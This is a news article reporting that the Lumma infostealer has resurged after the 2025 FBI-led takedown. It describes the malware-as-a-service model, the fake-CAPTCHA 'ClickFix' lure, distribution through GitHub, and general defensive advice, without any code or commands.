The Lumma infostealer, a malware-as-a-service that once infected nearly 400,000 Windows computers, is once again actively circulating, despite a significant international law enforcement effort last year aimed at dismantling its infrastructure. Security researchers are warning that the malware is “back at scale,” demonstrating a remarkable resilience and adaptability in the face of disruption.
Lumma first emerged in Russian-speaking cybercrime forums in 2022, quickly gaining traction due to its affordability and effectiveness. The malware operated on a subscription basis, with premium versions selling for as much as $2,500. By early 2024, the FBI had identified over 21,000 listings related to Lumma on illicit online marketplaces, highlighting its widespread adoption within the cybercriminal community. Microsoft identified Lumma as a “go-to tool” for several prolific threat actors, including the Scattered Spider group.
In May 2025, a coordinated international effort led by the FBI resulted in the seizure of over 2,300 domains, command-and-control servers and crime marketplaces associated with Lumma. This operation was initially hailed as a major victory against the infostealer. However, the recent resurgence of Lumma demonstrates the challenges inherent in combating malware-as-a-service operations, where infrastructure can be rapidly rebuilt and redeployed.
Researchers at Bitdefender reported that Lumma has rapidly rebuilt its infrastructure and continues to spread globally. This resurgence isn’t simply a continuation of the old methods; the threat actors behind Lumma are employing more covert tactics to evade detection.
A particularly concerning tactic being used in the current wave of Lumma infections is dubbed “ClickFix.” This social engineering technique relies on deceiving users into executing malicious commands within the Windows terminal. Victims are presented with what appears to be a CAPTCHA challenge, but instead of requiring them to identify images or letters, they are instructed to copy and paste a block of text into the terminal window. This text, however, contains malicious commands that download and install loader malware, which then deploys Lumma onto the compromised system.
The effectiveness of ClickFix lies in its simplicity and the speed with which it can be executed. Users are often lulled into a false sense of security, believing they are simply completing a routine CAPTCHA verification. The process requires minimal technical knowledge, making it accessible to a wide range of potential victims.
Lumma’s functionality centers around stealing sensitive information from compromised systems. This includes credentials (usernames and passwords), private files, and other data that can be used for identity theft, financial fraud, or further malicious activities. As a malware-as-a-service, Lumma lowers the barrier to entry for cybercriminals, allowing even those with limited technical skills to launch sophisticated attacks.
The re-emergence of Lumma highlights the limitations of relying solely on takedown operations to combat malware threats. While disrupting infrastructure can temporarily hinder an operation, it doesn’t necessarily eliminate the underlying threat. The actors behind Lumma have demonstrated an ability to adapt and rebuild, leveraging new techniques and infrastructure to continue their malicious activities.
Trend Micro researchers noted that Lumma is now distributed through more discreet channels, including abuse of platforms like GitHub and the use of fake CAPTCHA sites. This shift towards stealthier methods makes detection and prevention more challenging.
The ongoing evolution of Lumma underscores the importance of a multi-layered security approach. Organizations and individuals must prioritize cybersecurity awareness training, implement robust endpoint protection solutions, and stay informed about the latest threats and tactics used by cybercriminals. Specifically, users should be wary of any request to copy and paste commands into the Windows terminal, as this is a strong indicator of malicious activity.
The ability of Lumma to resurface so quickly after a major takedown serves as a stark reminder of the persistent and evolving nature of the cybersecurity landscape. Law enforcement efforts are crucial, but they must be coupled with proactive security measures and a commitment to continuous monitoring and adaptation to effectively mitigate the risks posed by sophisticated malware threats like Lumma.
